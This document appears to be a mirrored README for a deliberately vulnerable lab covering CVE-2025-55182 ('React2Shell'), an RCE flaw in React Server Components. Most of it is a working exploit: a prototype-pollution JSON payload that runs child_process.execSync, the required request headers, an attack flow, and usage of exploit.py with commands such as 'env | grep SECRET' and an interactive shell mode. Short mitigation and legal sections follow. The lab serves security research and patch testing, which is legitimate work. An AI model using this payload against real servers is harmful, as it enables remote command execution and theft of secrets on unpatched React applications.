Share
## https://sploitus.com/exploit?id=16B8B7D9-18EF-5794-ADBD-8D901B835F0C
# CVE-2025-55182 (React2Shell) - Vulnerable Lab

![CVE-2025-55182](https://img.shields.io/badge/CVE-2025--55182-critical)
![React](https://img.shields.io/badge/React-19.0.0-red)

## Overview

Vulnerable lab demonstrating **CVE-2025-55182 (React2Shell)** - a critical RCE vulnerability in React Server Components.

**โš ๏ธ FOR EDUCATIONAL PURPOSES ONLY**

---

## Vulnerability Details

- **CVE ID**: CVE-2025-55182
- **Type**: Remote Code Execution via Prototype Pollution
- **CVSS**: 9.8 (CRITICAL)
- **Affected**: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

### Attack Vector

React Server Components deserialize FormData unsafely. Specially crafted multipart fields trigger prototype pollution and execute arbitrary code via `child_process.execSync`.

---

## Quick Setup

```bash
npm install
pip3 install requests
npm run dev
```

Application runs at: **http://localhost:3000**

---

## Exploitation

### Basic Usage

```bash
python3 exploit.py -c "whoami"
```

### Command Examples

```bash
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
```

### Interactive Mode

```bash
python3 exploit.py -i
```

```
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit
```

---

## How It Works

### Payload Structure

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}
```

### Exploitation Flow

```
1. Send multipart with 3 fields (0, 1, 2)
2. React deserializes field 0
3. Prototype pollution via "then": "$1:__proto__:then"
4. $B1337 triggers polluted object processing
5. _response._prefix executed
6. child_process.execSync runs command
7. Result exfiltrated via NEXT_REDIRECT digest
8. RCE achieved
```

---

## Required Headers

```
Next-Action: x
Accept: text/x-component
Content-Type: multipart/form-data
```

---

## Mitigation

### Update React

```bash
npm install react@19.0.1 react-dom@19.0.1
```

### Patched Versions
- React 19.0.1+
- React 19.1.2+
- React 19.2.1+

---

## Project Structure

```
โ”œโ”€โ”€ src/app/
โ”‚   โ”œโ”€โ”€ page.tsx      # Simple vulnerable form
โ”‚   โ””โ”€โ”€ actions.ts    # Vulnerable Server Action
โ”œโ”€โ”€ exploit.py        # Python exploit
โ””โ”€โ”€ README.md
```

---

## Testing

### Terminal 1: Start server
```bash
npm run dev
```

### Terminal 2: Run exploit
```bash
python3 exploit.py -c "whoami"
```


### Verbose Mode
```bash
python3 exploit.py -c "whoami" -v
```

Shows full payload structure and server response

---

## References

- [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [React Security](https://github.com/facebook/react/security)
- [OWASP Deserialization](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)

---

## Legal

- For educational purposes only
- Use in isolated environments
- Never test without authorization
- Unauthorized exploitation is illegal

---

**Lab ready for CVE-2025-55182 research**